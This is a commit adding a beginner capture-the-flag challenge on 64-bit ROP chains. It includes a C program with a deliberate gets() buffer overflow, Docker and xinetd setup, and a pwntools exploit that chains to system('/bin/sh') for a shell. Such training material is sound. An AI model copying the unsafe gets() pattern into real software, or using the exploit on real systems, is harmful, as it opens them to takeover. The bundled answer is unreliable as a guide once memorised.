添加 pwn/ROP

challenges/pwn/ROP/README.md

@@ -0,0 +1,48 @@
+# ROP链
+
+- 作者：pn1fg
+
+- 参考：
+
+- 难度：Easy
+
+- 分类：Pwn
+
+- 暴露端口：70
+
+# 题目描述
+
+最简单的ROP链
+
+# 题目解析
+
+- 源码：[pwn.c](build/pwn.c)
+
+- 考点：64位ROP链
+
+[exp.py](writeup/exp.py)
+
+```python
+from pwn import *
+
+context.arch = 'amd64'
+context.log_level = 'debug'
+
+if args['REMOTE']:
+    io = remote(IP,port)
+else:
+    io = process('./pwn')
+
+elf = ELF("./pwn")
+rop = ROP(elf)
+
+rop.raw(cyclic(0x70 + 8))
+rop.raw(rop.find_gadget(["ret"]))
+rop.call(elf.sym["system"], [next(elf.search(b"/bin/sh"))])
+
+payload = rop.chain()
+io.sendlineafter(b'a?\n',payload)
+io.interactive()
+```
+
+

challenges/pwn/ROP/build/Dockerfile

@@ -0,0 +1,30 @@
+FROM ubuntu:22.04 AS builder
+FROM ghcr.io/svuctf/base/xinetd:alpine
+
+COPY init.sh /init.sh
+COPY xinetd.conf /etc/xinetd.conf
+
+RUN chmod +x /init.sh && \
+    chown -R ctf:ctf /home/ctf && \
+    chmod -R 750 /home/ctf && \
+    cp -R /lib* /home/ctf && \
+    mkdir /home/ctf/lib64  && \
+    mkdir /home/ctf/dev  && \
+    mknod /home/ctf/dev/null c 1 3 && \
+    mknod /home/ctf/dev/zero c 1 5 && \
+    mknod /home/ctf/dev/random c 1 8 && \
+    mknod /home/ctf/dev/urandom c 1 9 && \
+    chmod 666 /home/ctf/dev/* && \
+    mkdir /home/ctf/bin && \
+    mkdir -p /home/ctf/lib/x86_64-linux-gnu/ && \
+    mkdir -p /home/ctf/lib32/ && \
+    cp /bin/sh /home/ctf/bin && \
+    cp /bin/ls /home/ctf/bin && \
+    cp /bin/cat /home/ctf/bin && \
+    cp /bin/base64 /home/ctf/bin
+
+COPY --from=builder /lib/x86_64-linux-gnu/libc.so.6 /home/ctf/lib/x86_64-linux-gnu/
+COPY --from=builder /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /home/ctf/lib64/
+COPY --chown=ctf:ctf --chmod=500 pwn /home/ctf/pwn
+
+CMD ["xinetd", "-dontfork"]

challenges/pwn/ROP/build/init.sh

@@ -0,0 +1,7 @@
+#!/bin/sh
+
+echo $GZCTF_FLAG > /home/ctf/flag
+chown -R ctf:ctf /home/ctf/flag
+unset GZCTF_FLAG
+
+/usr/sbin/chroot /home/ctf/ /pwn

challenges/pwn/ROP/build/pwn.c

@@ -0,0 +1,40 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+char secret[7] = "/bin/sh";
+
+void init() {
+  setvbuf(stdout, 0, 2, 0);
+  setvbuf(stdin, 0, 2, 0);
+  setvbuf(stderr, 0, 2, 0);
+}
+
+void banner() {
+  puts("---------------------------------------------------\n"
+       "███████╗██╗   ██╗██╗   ██╗ ██████╗████████╗███████╗\n"
+       "██╔════╝██║   ██║██║   ██║██╔════╝╚══██╔══╝██╔════╝\n"
+       "███████╗██║   ██║██║   ██║██║        ██║   █████╗  \n"
+       "╚════██║╚██╗ ██╔╝██║   ██║██║        ██║   ██╔══╝  \n"
+       "███████║ ╚████╔╝ ╚██████╔╝╚██████╗   ██║   ██║     \n"
+       "╚══════╝  ╚═══╝   ╚═════╝  ╚═════╝   ╚═╝   ╚═╝     \n"
+       "                                                   \n"
+       "         WELCOME TO SVUCTF HELLOWORLD 2023         \n"
+       "---------------------------------------------------");
+}
+
+void gadget() {
+  asm("pop %rdi;ret;");
+}
+
+void vuln() {
+  char buf[100];
+  system("echo You know the size of the input data?");
+  gets(buf);
+}
+
+int main() {
+  init();
+  banner();
+  vuln();
+  return 0;
+}

challenges/pwn/ROP/build/xinetd.conf

@@ -0,0 +1,17 @@
+service ctf
+{
+    disable     = no
+    id          = xinetd
+    socket_type = stream
+    protocol    = tcp
+    wait        = no
+    user        = root
+    type        = UNLISTED
+    port        = 70
+    bind        = 0.0.0.0
+    server      = /init.sh
+    # safety options
+    per_source  = 10 # the maximum instances of this service per source IP address
+    rlimit_cpu  = 20 # the maximum number of CPU seconds that the service may use
+    rlimit_as   = 100M # the Address Space resource limit for the service
+}

challenges/pwn/ROP/writeup/exp.py

@@ -0,0 +1,20 @@
+from pwn import *
+
+context.arch = 'amd64'
+context.log_level = 'debug'
+
+if args['REMOTE']:
+    io = remote()
+else:
+    io = process('./pwn')
+
+elf = ELF("./pwn")
+rop = ROP(elf)
+
+rop.raw(cyclic(0x70 + 8))
+rop.raw(rop.find_gadget(["ret"]))
+rop.call(elf.sym["system"], [next(elf.search(b"/bin/sh"))])
+
+payload = rop.chain()
+io.sendlineafter(b'a?\n',payload)
+io.interactive()